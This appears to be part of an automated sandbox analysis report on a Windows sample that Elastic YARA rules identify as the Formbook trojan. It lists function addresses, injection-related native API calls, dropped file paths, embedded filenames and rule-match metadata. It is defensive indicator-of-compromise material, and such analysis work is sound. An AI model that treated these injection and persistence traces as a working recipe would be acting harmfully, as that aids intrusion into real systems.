Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272E80 NtReadVirtualMemory,	9_2_01272E80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272EE0 NtQueueApcThread,	9_2_01272EE0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01273010 NtOpenDirectoryObject,	9_2_01273010
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01273090 NtSetValueKey,	9_2_01273090
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012739B0 NtGetContextThread,	9_2_012739B0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01273D10 NtOpenProcessToken,	9_2_01273D10
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01273D70 NtOpenThread,	9_2_01273D70

Source: C:\Users\user\AppData\Local\Temp\bfc.exe

File created: C:\Users\user\AppData\Local\erindres\keres\skuboppernes.sys

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_02FAEFF0	1_2_02FAEFF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_02FADC00	1_2_02FADC00
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_064AAB88	1_2_064AAB88
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_064AAB98	1_2_064AAB98
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_07935EA8	1_2_07935EA8
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_07933DD0	1_2_07933DD0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_079355D0	1_2_079355D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_07933548	1_2_07933548
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_07933560	1_2_07933560
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_07933998	1_2_07933998
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 1_2_07930978	1_2_07930978
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00410003	9_2_00410003
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00416983	9_2_00416983
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0042D9A3	9_2_0042D9A3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00410223	9_2_00410223
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00401230	9_2_00401230
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0040E2A3	9_2_0040E2A3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00403340	9_2_00403340
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00402690	9_2_00402690
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_00402F70	9_2_00402F70
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0040FFFC	9_2_0040FFFC
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01230100	9_2_01230100
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DA118	9_2_012DA118
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C8158	9_2_012C8158
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F41A2	9_2_012F41A2
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_013001AA	9_2_013001AA
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F81CC	9_2_012F81CC
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D2000	9_2_012D2000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FA352	9_2_012FA352
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124E3F0	9_2_0124E3F0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_013003E6	9_2_013003E6
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0274	9_2_012E0274
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C02C0	9_2_012C02C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240535	9_2_01240535
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01300591	9_2_01300591
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E4420	9_2_012E4420
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F2446	9_2_012F2446
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EE4F6	9_2_012EE4F6
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01264750	9_2_01264750
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123C7C0	9_2_0123C7C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125C6E0	9_2_0125C6E0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01256962	9_2_01256962
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0130A9A6	9_2_0130A9A6
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124A840	9_2_0124A840
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01242840	9_2_01242840
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012268B8	9_2_012268B8
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126E8F0	9_2_0126E8F0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FAB40	9_2_012FAB40
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F6BD7	9_2_012F6BD7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80	9_2_0123EA80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124AD00	9_2_0124AD00
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DCD1F	9_2_012DCD1F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01258DBF	9_2_01258DBF
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123ADE0	9_2_0123ADE0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240C00	9_2_01240C00
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E0CB5	9_2_012E0CB5
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01230CF2	9_2_01230CF2
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01282F28	9_2_01282F28
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01260F30	9_2_01260F30
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E2F30	9_2_012E2F30
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B4F40	9_2_012B4F40
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BEFA0	9_2_012BEFA0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124CFE0	9_2_0124CFE0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01232FC8	9_2_01232FC8
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FEE26	9_2_012FEE26
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240E59	9_2_01240E59
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01252E90	9_2_01252E90
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FCE93	9_2_012FCE93
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FEEDB	9_2_012FEEDB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0127516C	9_2_0127516C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122F172	9_2_0122F172
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0130B16B	9_2_0130B16B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124B1B0	9_2_0124B1B0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F70E9	9_2_012F70E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FF0E0	9_2_012FF0E0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EF0CC	9_2_012EF0CC
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012470C0	9_2_012470C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F132D	9_2_012F132D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122D34C	9_2_0122D34C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0128739A	9_2_0128739A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012452A0	9_2_012452A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E12ED	9_2_012E12ED
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125B2C0	9_2_0125B2C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F7571	9_2_012F7571
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DD5B0	9_2_012DD5B0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FF43F	9_2_012FF43F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01231460	9_2_01231460
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FF7B0	9_2_012FF7B0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01285630	9_2_01285630
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F16CC	9_2_012F16CC
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D5910	9_2_012D5910
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01249950	9_2_01249950
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125B950	9_2_0125B950
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AD800	9_2_012AD800
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012438E0	9_2_012438E0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FFB76	9_2_012FFB76
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125FB80	9_2_0125FB80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B5BF0	9_2_012B5BF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0127DBF9	9_2_0127DBF9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B3A6C	9_2_012B3A6C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FFA49	9_2_012FFA49
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F7A46	9_2_012F7A46
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DDAAC	9_2_012DDAAC
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01285AA0	9_2_01285AA0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E1AA3	9_2_012E1AA3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EDAC6	9_2_012EDAC6
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F7D73	9_2_012F7D73
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01243D40	9_2_01243D40
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F1D5A	9_2_012F1D5A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125FDC0	9_2_0125FDC0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B9C32	9_2_012B9C32
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FFCF2	9_2_012FFCF2
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FFF09	9_2_012FFF09
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FFFB1	9_2_012FFFB1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01241F92	9_2_01241F92
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01249EB0	9_2_01249EB0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_024BEFF0	10_2_024BEFF0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_024BDC00	10_2_024BDC00
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_0587AB88	10_2_0587AB88
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_0587AB98	10_2_0587AB98
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_058A0040	10_2_058A0040
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_058A0006	10_2_058A0006
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_05A83DD0	10_2_05A83DD0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_05A855D0	10_2_05A855D0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_05A83560	10_2_05A83560
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_05A83548	10_2_05A83548
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_05A85EA8	10_2_05A85EA8
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_05A83998	10_2_05A83998
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 10_2_05A80978	10_2_05A80978
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01140100	23_2_01140100
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01196000	23_2_01196000
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011D02C0	23_2_011D02C0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01150535	23_2_01150535
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01174750	23_2_01174750
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01150770	23_2_01150770
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0114C7C0	23_2_0114C7C0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0116C6E0	23_2_0116C6E0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01166962	23_2_01166962
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011529A0	23_2_011529A0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01152840	23_2_01152840
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0115A840	23_2_0115A840
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01188890	23_2_01188890
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011368B8	23_2_011368B8
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0117E8F0	23_2_0117E8F0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0114EA80	23_2_0114EA80
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0115AD00	23_2_0115AD00
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0115ED7A	23_2_0115ED7A
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01168DBF	23_2_01168DBF
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01158DC0	23_2_01158DC0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0114ADE0	23_2_0114ADE0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01150C00	23_2_01150C00
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01140CF2	23_2_01140CF2
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01170F30	23_2_01170F30
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01192F28	23_2_01192F28
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011C4F40	23_2_011C4F40
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011CEFA0	23_2_011CEFA0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01142FC8	23_2_01142FC8
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01150E59	23_2_01150E59
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01162E90	23_2_01162E90
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0113F172	23_2_0113F172
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0118516C	23_2_0118516C
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0115B1B0	23_2_0115B1B0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0113D34C	23_2_0113D34C
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011533F3	23_2_011533F3
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011552A0	23_2_011552A0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0116B2C0	23_2_0116B2C0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0116D2F0	23_2_0116D2F0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01141460	23_2_01141460
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01153497	23_2_01153497
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011974E0	23_2_011974E0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0115B730	23_2_0115B730
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01159950	23_2_01159950
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0116B950	23_2_0116B950
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01155990	23_2_01155990
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011BD800	23_2_011BD800
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011538E0	23_2_011538E0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0116FB80	23_2_0116FB80
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0118DBF9	23_2_0118DBF9
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011C5BF0	23_2_011C5BF0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011C3A6C	23_2_011C3A6C
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01153D40	23_2_01153D40
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_0116FDC0	23_2_0116FDC0
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_011C9C32	23_2_011C9C32
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01169C20	23_2_01169C20
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01151F92	23_2_01151F92
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: 23_2_01159EB0	23_2_01159EB0

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: String function: 012BF290 appears 105 times
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: String function: 01275130 appears 58 times
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: String function: 01287E54 appears 103 times
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: String function: 012AEA12 appears 86 times
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: String function: 0122B970 appears 277 times
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: String function: 011BEA12 appears 37 times
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Code function: String function: 01197E54 appears 97 times

Source: P1 HWT623ATG.bat.exe	Binary or memory string: OriginalFilename vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe, 00000001.00000002.1281768717.000000000145E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe, 00000001.00000002.1287595079.00000000043AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe, 00000001.00000000.1239003746.0000000000E88000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameigyu.exe: vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe, 00000001.00000002.1293721485.00000000064C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe, 00000001.00000002.1294350979.0000000007C70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe, 00000001.00000002.1286350023.00000000030F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe, 00000009.00000002.1576160374.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe, 00000009.00000002.1576508573.000000000132D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe, 00000009.00000002.1576160374.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs P1 HWT623ATG.bat.exe
Source: P1 HWT623ATG.bat.exe	Binary or memory string: OriginalFilenameigyu.exe: vs P1 HWT623ATG.bat.exe

Source: P1 HWT623ATG.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.P1 HWT623ATG.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.P1 HWT623ATG.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.3719971214.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.3723441735.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.3709324958.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.3719882402.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1575209433.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
